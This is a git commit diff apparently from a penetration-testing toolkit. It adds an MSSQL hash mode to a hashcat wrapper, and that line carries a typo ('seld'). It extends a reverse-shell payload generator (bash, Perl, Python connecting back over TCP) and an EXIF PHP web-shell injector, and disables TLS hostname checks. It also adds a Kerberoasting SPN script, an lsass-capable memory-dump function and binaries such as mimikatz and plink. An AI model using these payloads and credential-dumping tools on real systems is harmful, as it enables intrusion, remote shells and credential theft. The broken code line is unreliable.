Windows Binaries + MSSQL hash type
This commit is contained in:
parent
2338077bd6
commit
95f3cad742
@ -63,6 +63,7 @@ class HashType(enum.Enum):
|
||||
# Windows
|
||||
LM = 3000
|
||||
NTLM = 1000
|
||||
MSSQL = 1731
|
||||
|
||||
# Kerberos
|
||||
KERBEROS_AS_REQ = 7500
|
||||
@ -163,6 +164,9 @@ class Hash:
|
||||
self.type.append(HashType.RAW_SHA2_512)
|
||||
self.type.append(HashType.RAW_SHA3_512)
|
||||
self.type.append(HashType.RAW_KECCAK_256)
|
||||
elif hash_len == 140:
|
||||
if not self.isSalted:
|
||||
seld.type.append(HashType.MSSQL)
|
||||
|
||||
if len(self.type) == 0:
|
||||
print("%s: Unknown hash" % self.hash)
|
||||
@ -216,6 +220,6 @@ if len(uncracked_hashes) > 0:
|
||||
fp.write(b"%s\n" % hash.hash.encode("UTF-8"))
|
||||
fp.flush()
|
||||
|
||||
proc = subprocess.Popen(["hashcat", "-m", str(selected_type.value), "-a", "0", fp.name, wordlist, "--force"])
|
||||
proc = subprocess.Popen(["hashcat", "-m", str(selected_type.value), "-a", "0", fp.name, wordlist])
|
||||
proc.wait()
|
||||
fp.close()
|
||||
|
@ -10,7 +10,8 @@ def generatePayload(type, local_address, port):
|
||||
if type == "bash":
|
||||
return "bash -i >& /dev/tcp/%s/%d 0>&1" % (local_address, port)
|
||||
elif type == "perl":
|
||||
return "perl -e 'use Socket;$i=\"%s\";$p=%d;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");};'" % (local_address, port)
|
||||
return "perl -e 'use Socket;$i=\"%s\";$p=%d;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");};'\n" \
|
||||
"perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"%s:%d\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" % (local_address, port, local_address, port)
|
||||
elif type == "python" or type == "python2" or type == "python3":
|
||||
binary = type
|
||||
return "%s -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%d));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'" % (binary, local_address, port)
|
||||
|
@ -637,6 +637,7 @@ sub makeRequest {
|
||||
do {
|
||||
#Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later if needed)
|
||||
$ENV{HTTPS_PROXY} = "";
|
||||
$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME} = 0;
|
||||
|
||||
$lwp = LWP::UserAgent->new(env_proxy => 1,
|
||||
keep_alive => 1,
|
||||
@ -886,4 +887,3 @@ sub getTime {
|
||||
return $hour.":".$minute.":".$second;
|
||||
}
|
||||
}
|
||||
|
||||
|
BIN
pspy
Normal file
BIN
pspy
Normal file
Binary file not shown.
12
util.py
12
util.py
@ -118,20 +118,28 @@ def exifImage(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_t
|
||||
print("Invalid input. Either give an Image or a path to an image.")
|
||||
return
|
||||
|
||||
valid_tags = list(exif._constants.ATTRIBUTE_NAME_MAP.values())
|
||||
if exif_tag is None:
|
||||
exif_tag = "image_description"
|
||||
elif exif_tag == "all":
|
||||
for exif_tag in valid_tags:
|
||||
try:
|
||||
_in[exif_tag] = payload
|
||||
print("adding:", exif_tag)
|
||||
except Exception as e:
|
||||
pass
|
||||
else:
|
||||
valid_tags = dir(_in)
|
||||
|
||||
if exif_tag not in valid_tags:
|
||||
print("Invalid exif-tag. Choose one of the following:")
|
||||
print(", ".join(valid_tags))
|
||||
return
|
||||
|
||||
_in[exif_tag] = payload
|
||||
|
||||
if _out is None:
|
||||
sys.stdout.write(_in.get_file())
|
||||
sys.stdout.flush()
|
||||
|
||||
elif isinstance(_out, str):
|
||||
with open(_out, "wb") as f:
|
||||
f.write(_in.get_file())
|
||||
|
129
win/GetUserSPNs.ps1
Normal file
129
win/GetUserSPNs.ps1
Normal file
@ -0,0 +1,129 @@
|
||||
# Edits by Tim Medin
|
||||
# File: GetUserSPNS.ps1
|
||||
# Contents: Query the domain to find SPNs that use User accounts
|
||||
# Comments: This is for use with Kerberoast https://github.com/nidem/kerberoast
|
||||
# The password hash used with Computer accounts are infeasible to
|
||||
# crack; however, if the User account associated with an SPN may have
|
||||
# a crackable password. This tool will find those accounts. You do not
|
||||
# need any special local or domain permissions to run this script.
|
||||
# This script on a script supplied by Microsoft (details below).
|
||||
# History: 2016/07/07 Tim Medin Add -UniqueAccounts parameter to only get unique SAMAccountNames
|
||||
# 2016/04/12 Tim Medin Added -Request option to automatically get the tickets
|
||||
# 2014/11/12 Tim Medin Created
|
||||
|
||||
[CmdletBinding()]
|
||||
Param(
|
||||
[Parameter(Mandatory=$False,Position=1)] [string]$GCName,
|
||||
[Parameter(Mandatory=$False)] [string]$Filter,
|
||||
[Parameter(Mandatory=$False)] [switch]$Request,
|
||||
[Parameter(Mandatory=$False)] [switch]$UniqueAccounts
|
||||
)
|
||||
|
||||
Add-Type -AssemblyName System.IdentityModel
|
||||
|
||||
$GCs = @()
|
||||
|
||||
If ($GCName) {
|
||||
$GCs += $GCName
|
||||
} else { # find them
|
||||
$ForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
|
||||
$CurrentGCs = $ForestInfo.FindAllGlobalCatalogs()
|
||||
ForEach ($GC in $CurrentGCs) {
|
||||
#$GCs += $GC.Name
|
||||
$GCs += $ForestInfo.ApplicationPartitions[0].SecurityReferenceDomain
|
||||
}
|
||||
}
|
||||
|
||||
if (-not $GCs) {
|
||||
# no Global Catalogs Found
|
||||
Write-Host "No Global Catalogs Found!"
|
||||
Exit
|
||||
}
|
||||
|
||||
<#
|
||||
Things you can extract
|
||||
Name Value
|
||||
---- -----
|
||||
admincount {1}
|
||||
samaccountname {sqlengine}
|
||||
useraccountcontrol {66048}
|
||||
primarygroupid {513}
|
||||
userprincipalname {sqlengine@medin.local}
|
||||
instancetype {4}
|
||||
displayname {sqlengine}
|
||||
pwdlastset {130410454241766739}
|
||||
memberof {CN=Domain Admins,CN=Users,DC=medin,DC=local}
|
||||
samaccounttype {805306368}
|
||||
serviceprincipalname {MSSQLSvc/sql01.medin.local:1433, MSSQLSvc/sql01.medin.local}
|
||||
usnchanged {135252}
|
||||
lastlogon {130563243107145358}
|
||||
accountexpires {9223372036854775807}
|
||||
logoncount {34}
|
||||
adspath {LDAP://CN=sqlengine,CN=Users,DC=medin,DC=local}
|
||||
distinguishedname {CN=sqlengine,CN=Users,DC=medin,DC=local}
|
||||
badpwdcount {0}
|
||||
codepage {0}
|
||||
name {sqlengine}
|
||||
whenchanged {9/22/2014 6:45:21 AM}
|
||||
badpasswordtime {0}
|
||||
dscorepropagationdata {4/4/2014 2:16:44 AM, 4/4/2014 12:58:27 AM, 4/4/2014 12:37:04 AM,...
|
||||
lastlogontimestamp {130558419213902030}
|
||||
lastlogoff {0}
|
||||
objectclass {top, person, organizationalPerson, user}
|
||||
countrycode {0}
|
||||
cn {sqlengine}
|
||||
whencreated {4/4/2014 12:37:04 AM}
|
||||
objectsid {1 5 0 0 0 0 0 5 21 0 0 0 191 250 179 30 180 59 104 26 248 205 17...
|
||||
objectguid {101 165 206 61 61 201 88 69 132 246 108 227 231 47 109 102}
|
||||
objectcategory {CN=Person,CN=Schema,CN=Configuration,DC=medin,DC=local}
|
||||
usncreated {57551}
|
||||
#>
|
||||
|
||||
ForEach ($GC in $GCs) {
|
||||
$searcher = New-Object System.DirectoryServices.DirectorySearcher
|
||||
$searcher.SearchRoot = "LDAP://" + $GC
|
||||
$searcher.PageSize = 1000
|
||||
$searcher.Filter = "(&(!objectClass=computer)(servicePrincipalName=*))"
|
||||
$searcher.PropertiesToLoad.Add("serviceprincipalname") | Out-Null
|
||||
$searcher.PropertiesToLoad.Add("name") | Out-Null
|
||||
$searcher.PropertiesToLoad.Add("samaccountname") | Out-Null
|
||||
#$searcher.PropertiesToLoad.Add("userprincipalname") | Out-Null
|
||||
#$searcher.PropertiesToLoad.Add("displayname") | Out-Null
|
||||
$searcher.PropertiesToLoad.Add("memberof") | Out-Null
|
||||
$searcher.PropertiesToLoad.Add("pwdlastset") | Out-Null
|
||||
#$searcher.PropertiesToLoad.Add("distinguishedname") | Out-Null
|
||||
|
||||
$searcher.SearchScope = "Subtree"
|
||||
|
||||
$results = $searcher.FindAll()
|
||||
|
||||
[System.Collections.ArrayList]$accounts = @()
|
||||
|
||||
foreach ($result in $results) {
|
||||
foreach ($spn in $result.Properties["serviceprincipalname"]) {
|
||||
$o = Select-Object -InputObject $result -Property `
|
||||
@{Name="ServicePrincipalName"; Expression={$spn.ToString()} }, `
|
||||
@{Name="Name"; Expression={$result.Properties["name"][0].ToString()} }, `
|
||||
#@{Name="UserPrincipalName"; Expression={$result.Properties["userprincipalname"][0].ToString()} }, `
|
||||
@{Name="SAMAccountName"; Expression={$result.Properties["samaccountname"][0].ToString()} }, `
|
||||
#@{Name="DisplayName"; Expression={$result.Properties["displayname"][0].ToString()} }, `
|
||||
@{Name="MemberOf"; Expression={$result.Properties["memberof"][0].ToString()} }, `
|
||||
@{Name="PasswordLastSet"; Expression={[datetime]::fromFileTime($result.Properties["pwdlastset"][0])} } #, `
|
||||
#@{Name="DistinguishedName"; Expression={$result.Properties["distinguishedname"][0].ToString()} }
|
||||
if ($UniqueAccounts) {
|
||||
if (-not $accounts.Contains($result.Properties["samaccountname"][0].ToString())) {
|
||||
$accounts.Add($result.Properties["samaccountname"][0].ToString()) | Out-Null
|
||||
$o
|
||||
if ($Request) {
|
||||
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn.ToString() | Out-Null
|
||||
}
|
||||
}
|
||||
} else {
|
||||
$o
|
||||
if ($Request) {
|
||||
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn.ToString() | Out-Null
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
130
win/Out-Minidump.ps1
Normal file
130
win/Out-Minidump.ps1
Normal file
@ -0,0 +1,130 @@
|
||||
function Out-Minidump
|
||||
{
|
||||
<#
|
||||
.SYNOPSIS
|
||||
|
||||
Generates a full-memory minidump of a process.
|
||||
|
||||
PowerSploit Function: Out-Minidump
|
||||
Author: Matthew Graeber (@mattifestation)
|
||||
License: BSD 3-Clause
|
||||
Required Dependencies: None
|
||||
Optional Dependencies: None
|
||||
|
||||
.DESCRIPTION
|
||||
|
||||
Out-Minidump writes a process dump file with all process memory to disk.
|
||||
This is similar to running procdump.exe with the '-ma' switch.
|
||||
|
||||
.PARAMETER Process
|
||||
|
||||
Specifies the process for which a dump will be generated. The process object
|
||||
is obtained with Get-Process.
|
||||
|
||||
.PARAMETER DumpFilePath
|
||||
|
||||
Specifies the path where dump files will be written. By default, dump files
|
||||
are written to the current working directory. Dump file names take following
|
||||
form: processname_id.dmp
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
Out-Minidump -Process (Get-Process -Id 4293)
|
||||
|
||||
Description
|
||||
-----------
|
||||
Generate a minidump for process ID 4293.
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
Get-Process lsass | Out-Minidump
|
||||
|
||||
Description
|
||||
-----------
|
||||
Generate a minidump for the lsass process. Note: To dump lsass, you must be
|
||||
running from an elevated prompt.
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
Get-Process | Out-Minidump -DumpFilePath C:\temp
|
||||
|
||||
Description
|
||||
-----------
|
||||
Generate a minidump of all running processes and save them to C:\temp.
|
||||
|
||||
.INPUTS
|
||||
|
||||
System.Diagnostics.Process
|
||||
|
||||
You can pipe a process object to Out-Minidump.
|
||||
|
||||
.OUTPUTS
|
||||
|
||||
System.IO.FileInfo
|
||||
|
||||
.LINK
|
||||
|
||||
http://www.exploit-monday.com/
|
||||
#>
|
||||
|
||||
[CmdletBinding()]
|
||||
Param (
|
||||
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
|
||||
[System.Diagnostics.Process]
|
||||
$Process,
|
||||
|
||||
[Parameter(Position = 1)]
|
||||
[ValidateScript({ Test-Path $_ })]
|
||||
[String]
|
||||
$DumpFilePath = $PWD
|
||||
)
|
||||
|
||||
BEGIN
|
||||
{
|
||||
$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
|
||||
$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
|
||||
$Flags = [Reflection.BindingFlags] 'NonPublic, Static'
|
||||
$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
|
||||
$MiniDumpWithFullMemory = [UInt32] 2
|
||||
}
|
||||
|
||||
PROCESS
|
||||
{
|
||||
$ProcessId = $Process.Id
|
||||
$ProcessName = $Process.Name
|
||||
$ProcessHandle = $Process.Handle
|
||||
$ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
|
||||
|
||||
$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
|
||||
|
||||
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
|
||||
|
||||
$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
|
||||
$ProcessId,
|
||||
$FileStream.SafeFileHandle,
|
||||
$MiniDumpWithFullMemory,
|
||||
[IntPtr]::Zero,
|
||||
[IntPtr]::Zero,
|
||||
[IntPtr]::Zero))
|
||||
|
||||
$FileStream.Close()
|
||||
|
||||
if (-not $Result)
|
||||
{
|
||||
$Exception = New-Object ComponentModel.Win32Exception
|
||||
$ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
|
||||
|
||||
# Remove any partially written dump files. For example, a partial dump will be written
|
||||
# in the case when 32-bit PowerShell tries to dump a 64-bit process.
|
||||
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
|
||||
|
||||
throw $ExceptionMessage
|
||||
}
|
||||
else
|
||||
{
|
||||
Get-ChildItem $ProcessDumpPath
|
||||
}
|
||||
}
|
||||
|
||||
END {}
|
||||
}
|
BIN
win/SeatbeltNet4x64.exe
Normal file
BIN
win/SeatbeltNet4x64.exe
Normal file
Binary file not shown.
BIN
win/mimidrv64.sys
Normal file
BIN
win/mimidrv64.sys
Normal file
Binary file not shown.
BIN
win/mimikatz.exe
BIN
win/mimikatz.exe
Binary file not shown.
BIN
win/mimikatz64.exe
Normal file
BIN
win/mimikatz64.exe
Normal file
Binary file not shown.
BIN
win/plink.exe
BIN
win/plink.exe
Binary file not shown.
BIN
win/plink64.exe
Normal file
BIN
win/plink64.exe
Normal file
Binary file not shown.
Loading…
Reference in New Issue
Block a user